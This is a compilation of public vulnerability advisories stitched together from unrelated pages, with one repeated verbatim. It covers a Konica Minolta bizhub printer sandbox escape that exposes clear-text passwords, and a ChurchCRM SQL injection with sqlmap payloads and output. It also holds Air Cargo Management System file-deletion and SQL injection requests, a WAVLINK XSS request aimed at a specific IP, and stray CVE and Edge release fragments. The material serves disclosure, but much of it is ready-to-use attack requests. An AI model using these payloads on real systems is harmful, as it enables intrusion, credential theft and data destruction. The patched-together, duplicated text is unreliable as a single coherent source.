Konica Minolta bizhub MFP devices before 2022-04-14 have an internal Chromium browser that executes with root (aka superuser) access privileges.

Title

Sandbox Escape with Root Access & Clear-text passwords

Product

Multiple Konica Minolta bizhub MFP Printer Terminals

Vulnerable Version

see vulnerable / tested versions below

Fixed Version

see solution section below

CVE Number

CVE-2022-29586, CVE-2022-29587, CVE-2022-29588

By

Werner Schober (Office Vienna) Johannes Kruchem (Office Vienna) SEC Consult Vulnerability Lab

Multiple Konica Minolta MFP bizhub devices, as well as devices from other manufacturers with the same firmware, are vulnerable to a sandbox breakout via the internal browser that displays the help menus. The browser itself is started with root privileges, which allows access to the complete file system. A file in the file system contained the administrator password for the printer's web interface in plain text.

**Vendor description**

_"Konica Minolta is a Japanese multinational technology company headquartered in Marunouchi, Chiyoda, Tokyo, with offices in 49 countries worldwide. The company manufactures business and industrial imaging products, including copiers, laser printers, multi-functional peripherals (MFPs) and digital print systems for the production printing market. Konica Minolta's Managed Print Service (MPS) is called Optimised Print Services. The company also makes optical devices, including lenses and LCD film; medical and graphic imaging products, such as X-ray image processing systems, colour proofing systems, and X-ray film; photometers, 3-D digitizers, and other sensing products; and textile printers."_ 

Source: https://en.wikipedia.org/wiki/Konica\_Minolta 

**Business recommendation**

Konica Minolta provided a patch of the firmware and operating system very quickly at the start of the year 2020. For most of the devices this firmware update must be manually applied by service technicians as a remote service platform for remote firmware updates is not fully rolled out yet. Multiple COVID-19 lockdowns delayed this patching process of over hundreds of thousands of devices drastically. 

In case you didn't receive an update yet, approach your Konica Minolta contact. 

SEC Consult recommends to perform a thorough security review conducted by security professionals to identify and resolve all security issues. Furthermore, it is necessary to implement secure software design early in the development life cycle and adapt secure patch management procedures through an ISMS. 

SEC Consult also published a blog post titled "**Someone call the patch manager - how COVID-19 left hundreds of thousands of printers vulnerable**" containing a practical example of a possible attack vector. 

**Vulnerability overview/description****1) Sandbox Escape on the Physical Printer Touch Screen Terminal (CVE-2022-29586) **

A touch screen terminal is attached to the printer in order to manage print jobs, create new scans, simply copy a page or to configure the device. The touch screen terminal hosts a user interface, which is based upon a proprietary application. 

By opening certain applications and/or settings via the terminal, it was possible to observe a slight change in the look and feel of the user interface itself. It was quickly determined that this was the result of context change, meaning that the applications running are not solely based on the proprietary application only. 

After attaching a keyboard to one of the multiple USB ports of the printer and pressing specific key combinations, it was possible to determine that some application parts are running an ordinary Chromium browser in "kiosk mode", which can be escaped easily, although most of the key combinations were blacklisted. This allows an attacker to get full access to the underlying printer's operating-  and file system, including configuration files, passwords in clear text, proprietary scripts and many more. 

**2) Terminal UI/Chromium running as root (CVE-2022-29587) **

It was determined that the printer UI and the Chromium browser are running with root privileges after escaping the printer terminal's sandbox. This allows an attacker to get full access to all files and folders on the operating system.  

**3) Passwords stored in clear text on the file system (CVE-2022-29588) **

Multiple passwords in clear-text were found on the file system of the printer. 

This includes: 

*   Unix User Account Passwords 
*   Printer Administrative Passwords 

Examples can be found in the following proof of concept section.  

**Proof of concept**

The referenced screenshots in this advisory can be found in our blog post.

**1) Sandbox Escape on the Physical Printer Touch Screen Terminal (CVE-2022-29586)  **

The following steps are necessary to get full access to the printer's operating system. It is necessary to have physical access to the device and "User Authentication" must be used and "Public User Access" must be enabled on the device.   

**Step 1 - Public User Access **

The attacker has access as "Public User" to the device.  The button is marked red in "step1.jpg". 

**Step 2 - Utility **

An attacker has to click on the button called "Utility" in the user interface which should be open after step 1. The button is marked red in "step2.jpg". 

**Step 3 - Utility again **

An attacker has to click on the slightly different "Utility" button again in the next window. The button is marked red in "step3.jpg". 

**Step 4 – Accessing Chromium **

A slight change in the design of the user interface can be observed after clicking on the "Utility" button marked red in the step above. The reason for that is that the application, which is now visible, is launched inside of a Chromium browser in kiosk mode. The loaded web application in Chromium can be seen in image "step4.jpg". 

**Step 5 – Attaching a keyboard **

A keyboard has to be attached to the printer to breakout of the terminal's sandbox and get access to the operating system. This can be done directly via the USB port available on all printers. 

**Step 6 – Access Chromium Developer Console **

Most of the shortcuts available on a normal Linux operating system are blocked or crash the printer terminal, but it was still possible to get full access to the system by pressing the key F12, which opened up the Chromium developer console. This can be seen in "step6.jpg". 

**Step 7 – Accessing the file system **

The tab sources in the Chromium developer tools can be used to get full file system access. Arbitrary folders can be added and read by clicking on "Add folder to workspace".

For example, the folder /var/log/nginx/html/ got added to Chromium, which revealed a lot of interesting files. The probably most interesting one is the file called "ADMINPASS" containing the printer's administrator account password in cleartext. 

**2) Terminal UI/Chromium running as root  (CVE-2022-29587)  **

Files such as /etc/shadow can be accessed with the root user's permissions. 

**3) Passwords stored in clear text on the file system  (CVE-2022-29588)  **

The following files containing clear text passwords were identified on the printer's file system: 

**3.1) /etc/shadow **

The shadow file contained the password of the user ORDBMS. No passwords were set for other users. 

**3.2) /var/log/nginx/html/ADMINPASS **

This file contains the password for the printer's web interface. Another file with sensitive content was found in /var/log/nginx/html. The "ADMINPASS" file contained the administrator's password for the printer's terminal/web interface in clear text. 

**Vulnerable / tested versions**

According to Konica Minolta, 46 bizhub MFP models are affected. The number of affected  devices in the field are in the hundreds of thousands worldwide according to the vendor.  These devices are also re-branded and sold by other companies. 

The vulnerabilities have been tested on the following devices: 

*   C3350i 
*   C3300i 

**Konica Minolta provided the following list of affected models / versions: **

​Model name

Affected FW version

CVE-ID

bizhub 227, 287, 367, 308, 368, 458, 558, 758, 808, 958, PRO958, 308e, 368e, 458e, 558e, 658e, 4752, 4052, C227, C287, C258, C308, C368, C458, C558, C658, C659, C759, C3351, C3851, C3851FS

G00-U8 or later

CVE-2022-29586 CVE-2022-29587

bizhub C450i, C550i, C650i

G00-73 or later

CVE-2022-29586 CVE-2022-29587

bizhub C250i, C300i, C360i, C4050i, C3350i, C4000i, C3300i

G00-73 or later

CVE-2022-29586 CVE-2022-29587

bizhub C250i, C300i, C360i, C4050i, C3350i, C4000i, C3300i

Gxx-4A or prior

CVE-2022-29586 CVE-2022-29587 CVE-2022-29588

bizhub 306i, 226i, 246i, 266i, C3320i

Gxx-4A or prior

CVE-2022-29588 CVE-2022-29587 CVE-2022-29586

**Vendor contact timeline:**

2020-01-16

Contacting vendor through "KONICA MINOLTA PSIRT Vulnerability Report Form"

2020-01-16

Vendor responds with GPG public key for psirt@konicaminolta.com

2020-01-16

Forwarding encrypted advisory to Konica Minolta PSIRT

2020-01-29

Update from Konica Minolta PSIRT - The reported vulnerabilities were successfully reviewed and will be patched in a future firmware release. The release date will be provided soon.

2020-2022

Postponing release multiple times as the remote service platform for remote firmware updates has not been rolled out for most devices yet and hundreds of thousands of printers have to be patched manually on-site during the COVID-19 pandemic.

2022-04-13

Requesting status update from Konica Minolta PSIRT.

2022-04-14

Konica Minolta PSIRT responds by stating that all devices directly affected have already been patched.

2022-04-25

Sending security advisory draft to vendor for review.

2022-05-09

Konica Minolta provides a list of affected models and feedback.

2022-05-10

Receiving further feedback, adjusting advisory.

2022-05-12

Coordinated release of security advisory

**Solution**

Konica Minolta already provided a patch of the firmware and operating system at the start of the year 2020 that must be applied by service technicians manually on-site at all of their customer locations. Most affected devices don't have a remote service platform for remote firmware updates yet. If your service technician hasn't patched your system yet, schedule an appointment. 

It has to be noted that Konica Minolta tried to patch most of their printers as soon as possible, which is not an easy task due to the large amount of affected printers and their manual procedure during the COVID-19 pandemic with multiple lockdowns. 

Konica Minolta provided the following list of models with fixed FW versions: 

Model name

Fixed FW version

bizhub 227, 287, 367, 308, 368, 458, 558,758, 808, 958, PRO958, 308e, 368e, 458e,558e, 658e, 4752, 4052, C227, C287, C258, C308, C368, C458, C558, C658, C659, C759,C3351, C3851, C3851FS

GC2-X4 or later

bizhub C550i, C650i

G00-2B or later

bizhub C250i, C450i, C300i, C360i, C4050i, C3350i, C4000i, C3300i

G00-7B or later

bizhub C3320i

G00-4D or later

bizhub 306i, 226i, 246i, 266i

G00-4F or later

**Workaround**

The following hardening/workaround is available and was provided directly from Konica Minolta. 

*   Disable the use of the external USB keyboard by "Customer Administrator" setting. 
*   In addition, it is strongly recommended to change the Customer Admin password to a new one. 

**Advisory URL**

https://sec-consult.com/vulnerability-lab/ 

EOF Werner Schober, Johannes Kruchem / @2022 

_Interested to work with the experts of SEC Consult? Send us your application_

_Interested in improving your cyber security with the experts of SEC Consult? Contact our local offices_

CVE-2022-29587: Sandbox Escape with Root Access & Clear-text passwords in Konica Minolta bizhub MFP Printer Terminals

A SQL injection vulnerability exists in ChurchCRM version 2.0.0 to 4.4.5 that allows an authenticated attacker to issue an arbitrary SQL command to the database through the unsanitized EN_tyid, theID and EID fields used when an Edit action on an existing record is being performed.

*   Sat, May 14, 2022
*   4-minute read

**Summary**

     1
     2
     3
     4
     5
     6
     7
     8
     9
    10
    11
    12
    

    Product:                   Church Web CRM
    Manufacturer:              ChurchCRM
    Affected Version(s):       ChurchCRM 2.0.0 <= 4.4.5 
    Tested Version(s):         4.4.5
    Vulnerability Type:        SQL Injection (CWE-89) 
    Risk Level:                High
    Solution Status:           Unfixed
    Manufacturer Notification: 2021-09-16
    Solution Date:             n/a
    Public Disclosure:         2022-05-14
    CVE Reference:             CVE-2021-41965
    Author of Advisory:        Alexander Bilz
    

**Overview**

The manufacturer describes the product as follows (see 1):

> “An OpenSource CRM System Built for Churches. Your Church can benefit from giving your staff and volunteers the tools they need to make every interaction more valuable.”

The software comes with an abundance of features relevant to churches and managing a congregation. Among others it allows to conduct:

*   Conduct Fundraisers
*   Manage Church Members
*   Publish Events
*   Manage Sunday Schools

The source code can be found on ChurchCRM’s GitHub account 2.

ChurchCRM is vulnerable to SQL injection attacks due to a lack of input validation and no additional protection mechanisms.

**Vulnerability Details**

Church CRM allows its users to schedule church events, such as church services, Sunday school or summer camps. Once an event has been created it can also be edited and deleted again through the events page.

Hereby, it was detected that the parameter EID, which is sent along when editing an existing entry, is susceptible to an SQL injection attack. On edit, data is posted to the EventEditor.php where it is executed on the database.

Similarly, the EN_tyid parameter of the EditEventTypes.php and theID of the EventNames.php endpoint can be abused for injecting arbitrary SQL queries.

Different types of SQL injection techniques can be applied, including:

*   Boolean-based blind
*   Time-based blind

The vulnerable functionality is only accessible when authenticated.

**Proof of Concept (PoC)**

As a proof of concept, the EN\_tyid parameter, which is sent when an event is edited, will be abused to query the database management system using sqlmap 3.

Let’s start with the HTTP request I had captured in Burp Suite.

     1
     2
     3
     4
     5
     6
     7
     8
     9
    10
    11
    12
    13
    14
    15
    

    POST /churchcrm/EditEventTypes.php HTTP/1.1  
    Host: <IP>  
    Content-Length: 21  
    Cache-Control: max-age=0  
    Upgrade-Insecure-Requests: 1  
    Origin: http://<IP> 
    Content-Type: application/x-www-form-urlencoded  
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.150 Safari/537.36  
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9  
    Referer: http://<IP>/churchcrm/EventNames.php  
    Accept-Encoding: gzip, deflate  
    Accept-Language: en-US,en;q=0.9  
    Cookie: <Cookie Value>  
    Connection: close  
    EN_tyid=4&Action=Edit
    

This request could then be passed to sqlmap for injecting the EN_tyid parameter.

     1
     2
     3
     4
     5
     6
     7
     8
     9
    10
    11
    12
    13
    14
    15
    16
    17
    18
    19
    20
    21
    22
    23
    24
    25
    26
    27
    28
    29
    30
    31
    32
    33
    34
    35
    36
    

    ┌──(kali㉿kali)-[~/ChurchCRM] 
    └─$ sqlmap -r churchcrm.txt -p EN_tyid -dbs 
            ___ 
           __H__                                                                  
     ___ ___[,]_____ ___ ___  {1.5.5#stable}                                      
    |_ -| . [.]     | .'| . |                                                     
    |___|_  [)]_|_|_|__,|  _|                                                     
          |_|V...       |_|   http://sqlmap.org                                   
    [!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program 
    [*] starting @ 10:42:27 /2021-09-16/ 
    [10:42:27] [INFO] parsing HTTP request from 'churchcrm.txt' 
    [10:42:28] [INFO] resuming back-end DBMS 'mysql'  
    [10:42:28] [INFO] testing connection to the target URL 
    sqlmap resumed the following injection point(s) from stored session: 
    --- 
    Parameter: EN_tyid (POST) 
        Type: time-based blind 
        Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP) 
        Payload: EN_tyid=4' AND (SELECT 8001 FROM (SELECT(SLEEP(5)))vpfX) AND 'KFAy'='KFAy&Action=Edit 
        Type: UNION query 
        Title: Generic UNION query (NULL) - 9 columns 
        Payload: EN_tyid=-8227' UNION ALL SELECT NULL,CONCAT(0x7162766a71,0x58587254614b525a474f487269586c6d55424859667574764267587a484c79595a78496f66665959,0x7178706271),NULL,NULL,NULL,NULL,NULL,NULL,NULL-- -&Action=Edit 
    --- 
    [10:42:29] [INFO] the back-end DBMS is MySQL 
    web application technology: Apache 2.4.48, PHP 7.3.30 
    back-end DBMS: MySQL >= 5.0.12 (MariaDB fork) 
    [10:42:29] [INFO] fetching database names 
    [10:42:31] [INFO] retrieved: 'information_schema' 
    [10:42:32] [INFO] retrieved: 'test' 
    [10:42:33] [INFO] retrieved: 'churchcrm' 
    available databases [3]:                                                     
    [*] churchcrm 
    [*] information_schema 
    [*] test 
    [10:42:33] [INFO] fetched data logged to text files under '/home/kali/.local/share/sqlmap/output/192.168.11.170'                                           
    [*] ending @ 10:42:33 /2021-09-16/
    

**Disclosure Timeline**

I had reached out immediately to the vendor via email on 2021-09-16, who never replied to my request. Following a responsible disclosure approach, I decided to file for a CVE and ultimately disclose the vulnerability publicly.

The overall timeline for disclosing this vulnerability was as follows:

*   2021-09-16: Vulnerability discovered
*   2021-09-16: Vulnerability reported to the manufacturer
*   2022-05-02: CVE has been reserved
*   2022-05-14: Public disclosure of the vulnerability

**Credits**

This security vulnerability was found by Alexander Bilz.

*   E-Mail: mail\[at\]alexbilz.com
*   Public Key: https://www.alexbilz.com/ABilz.asc
*   Key ID: 0X474CECFD3DBC6880
*   Key Fingerprint: 6C0E A8D0 C428 ED1D 8C2E C4A0 474C ECFD 3DBC 6880

**Disclaimer**

The information provided in this security advisory is provided “as is” and without warranty of any kind. Details of this security advisory may be updated to provide as accurate information as possible.

**References**

1.  Product website for ChurchCRM http://churchcrm.io/ ↩︎
    
2.  ChurchCRM CRM Sourcecode https://github.com/ChurchCRM/CRM ↩︎
    
3.  Link to sqlmap https://sqlmap.org/ ↩︎

CVE-2021-41965: SQL Injection Vulnerability in ChurchCRM (CVE-2021-41965)

*   Sat, May 14, 2022
*   4-minute read

**Summary**

     1
     2
     3
     4
     5
     6
     7
     8
     9
    10
    11
    12
    

    Product:                   Church Web CRM
    Manufacturer:              ChurchCRM
    Affected Version(s):       ChurchCRM 2.0.0 <= 4.4.5 
    Tested Version(s):         4.4.5
    Vulnerability Type:        SQL Injection (CWE-89) 
    Risk Level:                High
    Solution Status:           Unfixed
    Manufacturer Notification: 2021-09-16
    Solution Date:             n/a
    Public Disclosure:         2022-05-14
    CVE Reference:             CVE-2021-41965
    Author of Advisory:        Alexander Bilz
    

**Overview**

The manufacturer describes the product as follows (see 1):

> “An OpenSource CRM System Built for Churches. Your Church can benefit from giving your staff and volunteers the tools they need to make every interaction more valuable.”

The software comes with an abundance of features relevant to churches and managing a congregation. Among others it allows to conduct:

*   Conduct Fundraisers
*   Manage Church Members
*   Publish Events
*   Manage Sunday Schools

The source code can be found on ChurchCRM’s GitHub account 2.

ChurchCRM is vulnerable to SQL injection attacks due to a lack of input validation and no additional protection mechanisms.

**Vulnerability Details**

Church CRM allows its users to schedule church events, such as church services, Sunday school or summer camps. Once an event has been created it can also be edited and deleted again through the events page.

Hereby, it was detected that the parameter EID, which is sent along when editing an existing entry, is susceptible to an SQL injection attack. On edit, data is posted to the EventEditor.php where it is executed on the database.

Similarly, the EN_tyid parameter of the EditEventTypes.php and theID of the EventNames.php endpoint can be abused for injecting arbitrary SQL queries.

Different types of SQL injection techniques can be applied, including:

*   Boolean-based blind
*   Time-based blind

The vulnerable functionality is only accessible when authenticated.

**Proof of Concept (PoC)**

As a proof of concept, the EN\_tyid parameter, which is sent when an event is edited, will be abused to query the database management system using sqlmap 3.

Let’s start with the HTTP request I had captured in Burp Suite.

     1
     2
     3
     4
     5
     6
     7
     8
     9
    10
    11
    12
    13
    14
    15
    

    POST /churchcrm/EditEventTypes.php HTTP/1.1  
    Host: <IP>  
    Content-Length: 21  
    Cache-Control: max-age=0  
    Upgrade-Insecure-Requests: 1  
    Origin: http://<IP> 
    Content-Type: application/x-www-form-urlencoded  
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.150 Safari/537.36  
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9  
    Referer: http://<IP>/churchcrm/EventNames.php  
    Accept-Encoding: gzip, deflate  
    Accept-Language: en-US,en;q=0.9  
    Cookie: <Cookie Value>  
    Connection: close  
    EN_tyid=4&Action=Edit
    

This request could then be passed to sqlmap for injecting the EN_tyid parameter.

     1
     2
     3
     4
     5
     6
     7
     8
     9
    10
    11
    12
    13
    14
    15
    16
    17
    18
    19
    20
    21
    22
    23
    24
    25
    26
    27
    28
    29
    30
    31
    32
    33
    34
    35
    36
    

    ┌──(kali㉿kali)-[~/ChurchCRM] 
    └─$ sqlmap -r churchcrm.txt -p EN_tyid -dbs 
            ___ 
           __H__                                                                  
     ___ ___[,]_____ ___ ___  {1.5.5#stable}                                      
    |_ -| . [.]     | .'| . |                                                     
    |___|_  [)]_|_|_|__,|  _|                                                     
          |_|V...       |_|   http://sqlmap.org                                   
    [!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program 
    [*] starting @ 10:42:27 /2021-09-16/ 
    [10:42:27] [INFO] parsing HTTP request from 'churchcrm.txt' 
    [10:42:28] [INFO] resuming back-end DBMS 'mysql'  
    [10:42:28] [INFO] testing connection to the target URL 
    sqlmap resumed the following injection point(s) from stored session: 
    --- 
    Parameter: EN_tyid (POST) 
        Type: time-based blind 
        Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP) 
        Payload: EN_tyid=4' AND (SELECT 8001 FROM (SELECT(SLEEP(5)))vpfX) AND 'KFAy'='KFAy&Action=Edit 
        Type: UNION query 
        Title: Generic UNION query (NULL) - 9 columns 
        Payload: EN_tyid=-8227' UNION ALL SELECT NULL,CONCAT(0x7162766a71,0x58587254614b525a474f487269586c6d55424859667574764267587a484c79595a78496f66665959,0x7178706271),NULL,NULL,NULL,NULL,NULL,NULL,NULL-- -&Action=Edit 
    --- 
    [10:42:29] [INFO] the back-end DBMS is MySQL 
    web application technology: Apache 2.4.48, PHP 7.3.30 
    back-end DBMS: MySQL >= 5.0.12 (MariaDB fork) 
    [10:42:29] [INFO] fetching database names 
    [10:42:31] [INFO] retrieved: 'information_schema' 
    [10:42:32] [INFO] retrieved: 'test' 
    [10:42:33] [INFO] retrieved: 'churchcrm' 
    available databases [3]:                                                     
    [*] churchcrm 
    [*] information_schema 
    [*] test 
    [10:42:33] [INFO] fetched data logged to text files under '/home/kali/.local/share/sqlmap/output/192.168.11.170'                                           
    [*] ending @ 10:42:33 /2021-09-16/
    

**Disclosure Timeline**

I had reached out immediately to the vendor via email on 2021-09-16, who never replied to my request. Following a responsible disclosure approach, I decided to file for a CVE and ultimately disclose the vulnerability publicly.

The overall timeline for disclosing this vulnerability was as follows:

*   2021-09-16: Vulnerability discovered
*   2021-09-16: Vulnerability reported to the manufacturer
*   2022-05-02: CVE has been reserved
*   2022-05-14: Public disclosure of the vulnerability

**Credits**

This security vulnerability was found by Alexander Bilz.

*   E-Mail: mail\[at\]alexbilz.com
*   Public Key: https://www.alexbilz.com/ABilz.asc
*   Key ID: 0X474CECFD3DBC6880
*   Key Fingerprint: 6C0E A8D0 C428 ED1D 8C2E C4A0 474C ECFD 3DBC 6880

**Disclaimer**

The information provided in this security advisory is provided “as is” and without warranty of any kind. Details of this security advisory may be updated to provide as accurate information as possible.

**Copyright**

Creative Commons - Attribution (by) - Version 3.0 URL: http://creativecommons.org/licenses/by/3.0/deed.en

**References**

1.  Product website for ChurchCRM http://churchcrm.io/ ↩︎
    
2.  ChurchCRM CRM Sourcecode https://github.com/ChurchCRM/CRM ↩︎
    
3.  Link to sqlmap https://sqlmap.org/ ↩︎

Air Cargo Management System v1.0 is vulnerable to file deletion via /acms/classes/Master.php?f=delete_img.

**Air Cargo Management System v1.0 by oretnom23 has Delete any file**

vendors: https://www.sourcecodester.com/php/15188/air-cargo-management-system-php-oop-free-source-code.html

Vulnerability File: /acms/classes/Master.php?f=delete\_img

Vulnerability location: /acms/classes/Master.php?f=delete\_img, path

The password for the backend login account is: admin/admin123

Payload:

Here we delete the shel.php file in the root directory

POST /acms/classes/Master.php?f\=delete\_img HTTP/1.1
Host: 192.168.1.19
Content\-Length: 45
Accept: application/json, text/javascript, \*/\*; q=0.01
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.127 Safari/537.36
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Origin: http://192.168.1.19
Referer: http://192.168.1.19/acms/admin/?page=system\_info
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: PHPSESSID=8j006kgjjl9sdts88scke1lkuq
Connection: close
path=C%3A%2Fxampp%2Fhtdocs%2Facms%2Fshell.php // Here we delete the shel.php file in the root directory

The file path needs to be encoded by url

At present, the shell.php file is still in the root directory of the website, when we send a request to delete the shell.php file

The response package shows that the deletion was successful. Let's go to the root directory to see if the shell.php file still exists.

By this time, shell.php has been deleted.

CVE-2022-30367: bug_report/delet-file-1.md at main · k0xx11/bug_report

Air Cargo Management System 1.0 is vulnerable to SQL Injection via /acms/classes/Master.php?f=delete_cargo_type.

Permalink

Cannot retrieve contributors at this time

**Air Cargo Management System v1.0 by oretnom23 has SQL injection**

vendors: https://www.sourcecodester.com/php/15188/air-cargo-management-system-php-oop-free-source-code.html

The password for the backend login account is: admin/admin123

Vulnerability File: /acms/classes/Master.php?f=delete\_cargo\_type

Vulnerability location: /acms/classes/Master.php?f=delete\_cargo\_type, id

\[+\] Payload: id=3' and updatexml(1,concat(0x7e,(select database()),0x7e),0)--+ // Leak place ---> id

POST /acms/classes/Master.php?f\=delete\_cargo\_type HTTP/1.1
Host: 192.168.1.19
Content\-Length: 65
Accept: application/json, text/javascript, \*/\*; q=0.01
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.127 Safari/537.36
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Origin: http://192.168.1.19
Referer: http://192.168.1.19/acms/admin/?page=cargo\_types
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: PHPSESSID=8j006kgjjl9sdts88scke1lkuq
Connection: close
id=3' and updatexml(1,concat(0x7e,(select database()),0x7e),0)--+ // Leak place ---> id

CVE-2022-30370: bug_report/SQLi-1.md at main · k0xx11/bug_report

WAVLINK WN535 G3 was discovered to contain a cross-site scripting (XSS) vulnerability via the hostname parameter at /cgi-bin/login.cgi.

    POST /cgi-bin/login.cgi HTTP/1.1 Host: 98.127.66.193 Content-Length: 255 Cache-Control: max-age=0 Upgrade-Insecure-Requests: 1 Origin: http://98.127.66.193 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9 Referer: http://98.127.66.193/ Accept-Encoding: gzip, deflate Accept-Language: zh-CN,zh;q=0.9 Connection: close newUI=1&page=login&username=admin&langChange=0&ipaddr=171.113.240.243&login_page=login.shtml&homepage=main.shtml&sysinitpage=sysinit.shtml&hostname=")&lt;/&gt;&lt;&gt;alert(1)&lt;/&gt;&key=M27234733&password=63a36bceec2d3bba30d8611c323f4cda&lang_=cn

CVE-2022-30489: GitHub - badboycxcc/XSS-CVE-2022-30489

CVE-2022-30489: GitHub - badboycxcc/XSS

**What is the version information for this release?**

Microsoft Edge Version

Date Released

Based on Chromium Version

101.0.1210.47

5/13/2022

101.0.4951.64

CVE-ID

Learn more at National Vulnerability Database (NVD)

• CVSS Severity Rating • Fix Information • Vulnerable Software Versions • SCAP Mappings • CPE Information

Description

\*\* RESERVED \*\* This candidate has been reserved by an organization or individual that will use it when announcing a new security problem. When the candidate has been publicized, the details for this candidate will be provided.

References

**Note:** References are provided for the convenience of the reader to help distinguish between vulnerabilities. The list is not intended to be complete.

Assigning CNA

N/A

Date Record Created

**20220509**

Disclaimer: The record creation date may reflect when the CVE ID was allocated or reserved, and does not necessarily indicate when this vulnerability was discovered, shared with the affected vendor, publicly disclosed, or updated in CVE.

Phase (Legacy)

Assigned (20220509)

Votes (Legacy)

Comments (Legacy)

Proposed (Legacy)

N/A

This is a record on the CVE List, which provides common identifiers for publicly known cybersecurity vulnerabilities.

Search CVE Using Keywords:  

You can also search by reference using the CVE Reference Maps.

For More Information:  CVE Request Web Form (select "Other" from dropdown)

Tag

#chrome